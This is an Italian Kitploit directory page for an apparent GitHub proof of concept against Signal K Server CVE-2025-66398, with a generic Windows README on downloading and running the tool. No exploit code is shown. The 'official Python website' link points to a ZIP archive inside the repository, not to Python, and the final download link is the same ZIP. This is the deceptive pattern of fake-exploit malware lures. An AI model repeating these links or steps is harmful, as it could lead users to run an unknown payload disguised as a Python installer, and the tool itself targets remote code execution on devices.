Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2025-66398 — Dimostra lo sfruttamento del Signal K Server CVE-2025-66398, che consente ad attaccanti non autenticati di iniettare una backdoor e abilitare l'esecuzione remota di codice. | Kitploit
Strumenti/GitHubGitHub/showy-headteacher114/cve-2025-66398
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso RemotoSviluppo Payload
GitHubshowy-headteacher114/cve-2025-66398

cve-2025-66398

Dimostra lo sfruttamento del Signal K Server CVE-2025-66398, che consente ad attaccanti non autenticati di iniettare una backdoor e abilitare l'esecuzione remota di codice.

Vedi Repository
132 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

⚠️ cve-2025-66398 - Semplice strumento Proof of Concept per RCE

Download


⚙️ Informazioni su Questo Strumento

Questo progetto dimostra una vulnerabilità di esecuzione remota di codice (RCE) in Signal K Server versioni 2.18.0 e precedenti. La proof of concept (PoC) mostra come un attaccante potrebbe eseguire comandi su un dispositivo vulnerabile.

Questo strumento è pensato per tester di sicurezza, amministratori di sistema o chiunque sia interessato a comprendere questo problema di sicurezza. Non richiede competenze di programmazione per essere eseguito, ma una conoscenza di base dell'uso del computer è utile.


🖥️ Requisiti di Sistema

  • Windows 10 o successivo
  • Almeno 2 GB di RAM libera
  • 100 MB di spazio libero su disco
  • Connessione Internet per scaricare i file
  • NON sono necessari privilegi di amministratore

📥 Come Scaricare e Installare

Fai clic sul pulsante qui sotto per visitare la pagina del progetto e scaricare i file.

Download

Passo 1: Visita la Pagina di Download

Vai al link qui sopra. Vedrai un elenco di file e cartelle nella pagina GitHub.

Passo 2: Scarica il File ZIP

Cerca il pulsante verde Code in alto a destra nella pagina. Fai clic su di esso e seleziona Download ZIP.

Passo 3: Estrai i File

  • Trova il file ZIP scaricato nella cartella Download.
  • Fai clic con il tasto destro sul file ZIP e seleziona Extract All (Estrai tutto).
  • Scegli una cartella in cui vuoi salvare i file, quindi fai clic su Extract (Estrai).

Passo 4: Individua l'Applicazione

Apri la cartella estratta. Dovresti vedere file relativi al progetto, come script e documentazione.


▶️ Come Eseguire lo Strumento su Windows

Il progetto usa script scritti in Python e Go. Per eseguire lo strumento, userai una semplice finestra del prompt dei comandi.

Passo 1: Apri il Prompt dei Comandi

  • Premi Win + R sulla tastiera.
  • Digita cmd e premi Invio.

Passo 2: Naviga fino alla Cartella

Digita questo comando, sostituendo path\to\folder con il percorso della cartella estratta:

root@kitploit:~
cd path\to\folder

Premi Invio.

Passo 3: Esegui lo Script

Potresti trovare uno script con un nome come run.bat o start.bat. In tal caso, digita il suo nome e premi Invio. Per esempio:

root@kitploit:~
run.bat

Se non c'è un file BAT, cerca uno script Python che termina con .py. Dovrai avere Python installato sul tuo PC (vedi la sezione successiva).

Digita questo comando per eseguirlo:

root@kitploit:~
python scriptname.py

Sostituisci scriptname.py con il nome effettivo del file.


🐍 Installare Python (Se Necessario)

Se ricevi un errore che dice che Python non è riconosciuto, devi installare Python.

Passo 1: Scarica Python

Vai al sito web ufficiale di Python:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

Fai clic sull'ultimo installer per Windows e scaricalo.

Passo 2: Installa Python

  • Esegui l'installer scaricato.
  • Spunta la casella che dice Add Python to PATH prima di fare clic su Install Now (Installa ora).
  • Attendi fino al termine dell'installazione.

Passo 3: Verifica l'Installazione di Python

Apri una nuova finestra del prompt dei comandi e digita:

root@kitploit:~
python --version

Dovrebbe mostrare la versione di Python installata.


🚨 Eseguire lo Strumento in Sicurezza

Questo strumento è solo per testare e imparare a conoscere una specifica vulnerabilità. Usalo in un ambiente sicuro, come una rete di test o una macchina isolata.

Non eseguirlo mai contro sistemi che non possiedi o per cui non hai il permesso di testare.


🔍 Come Funziona lo Strumento

Lo strumento esegue la scansione dei dispositivi che eseguono Signal K Server versione 2.18.0 o precedente. Tenta di inviare comandi che sfruttano la vulnerabilità e verifica se il target li esegue.

Questo consente ai professionisti della sicurezza di confermare se i loro sistemi sono vulnerabili e di agire per aggiornarli o proteggerli.


💡 Risoluzione dei Problemi

  • Se lo strumento non si avvia, controlla di essere nella cartella corretta nel prompt dei comandi.
  • Assicurati che Python sia installato e aggiunto al PATH di sistema.
  • Chiudi altre applicazioni che potrebbero bloccare l'accesso alla rete.
  • Esegui il prompt dei comandi come amministratore se incontri errori di autorizzazione.
  • Assicurati che il dispositivo target sia raggiungibile sulla rete.

📄 Risorse Aggiuntive

Per maggiori informazioni sulla vulnerabilità CVE-2025-66398, cerca su database di sicurezza o su GitHub ricerche correlate.


🔗 Link di Download

Visita questa pagina per scaricare i file dello strumento:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

Scarica lo strumento